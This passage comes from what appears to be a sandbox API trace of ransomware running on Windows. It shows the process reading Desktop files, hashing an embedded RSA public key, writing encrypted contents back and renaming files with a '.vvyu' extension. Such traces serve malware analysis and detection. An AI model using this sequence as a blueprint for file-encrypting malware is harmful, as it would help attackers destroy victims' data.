returned 1 [0192.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30d0 | out: hHeap=0x620000) returned 1 [0192.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32e8 | out: hHeap=0x620000) returned 1 [0192.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0192.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e954e8 | out: hHeap=0x620000) returned 1 [0192.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ec0 | out: hHeap=0x620000) returned 1 [0192.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.836] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ea68*, nNumberOfBytesToWrite=0x444e, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e9ea68*, lpNumberOfBytesWritten=0x312fb14*=0x444e, lpOverlapped=0x0) returned 1 [0192.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.837] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x4453, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.837] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.848] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.849] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.849] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.849] CloseHandle (hObject=0x568) returned 1 [0192.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e9ea68 [0192.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.850] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\QQ3XsPcRg.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\qq3xspcrg.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\QQ3XsPcRg.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\qq3xspcrg.swf.vvyu")) returned 1 [0192.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.853] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.856] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2e94350, ftCreationTime.dwHighDateTime=0x1d898b1, ftLastAccessTime.dwLowDateTime=0xcb0bd270, ftLastAccessTime.dwHighDateTime=0x1d8a2f0, ftLastWriteTime.dwLowDateTime=0xcb0bd270, ftLastWriteTime.dwHighDateTime=0x1d8a2f0, nFileSizeHigh=0x0, nFileSizeLow=0x16ae6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QYjbm5MiXLG2.mp3", cAlternateFileName="QYJBM5~1.MP3")) returned 1 [0192.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e954e8 [0192.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e954e8 | out: hHeap=0x620000) returned 1 [0192.857] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\QYjbm5MiXLG2.mp3") returned=".mp3" [0192.857] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\QYjbm5MiXLG2.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\qyjbm5mixlg2.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.857] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=92902) returned 1 [0192.857] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.862] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x16ac0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.862] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.865] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.865] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x16ae6, lpOverlapped=0x0) returned 1 [0192.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.866] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.867] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.867] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.867] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.867] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.867] GetLastError () returned 0x0 [0192.867] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.867] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.868] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.868] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.868] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16af0) returned 0x2ea79b0 [0192.869] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e954e8 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95530 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0192.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0192.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.870] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9ea68 [0192.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0192.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936f0 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c936d8 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0192.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.873] GetCurrentThreadId () returned 0x66c [0192.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e9b0 [0192.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.873] GetCurrentThreadId () returned 0x66c [0192.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0192.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936f0 [0192.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93750 [0192.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0192.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0192.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93768 [0192.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93708 [0192.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936d8 [0192.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9ea68 [0192.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0192.877] HeapFree (in: 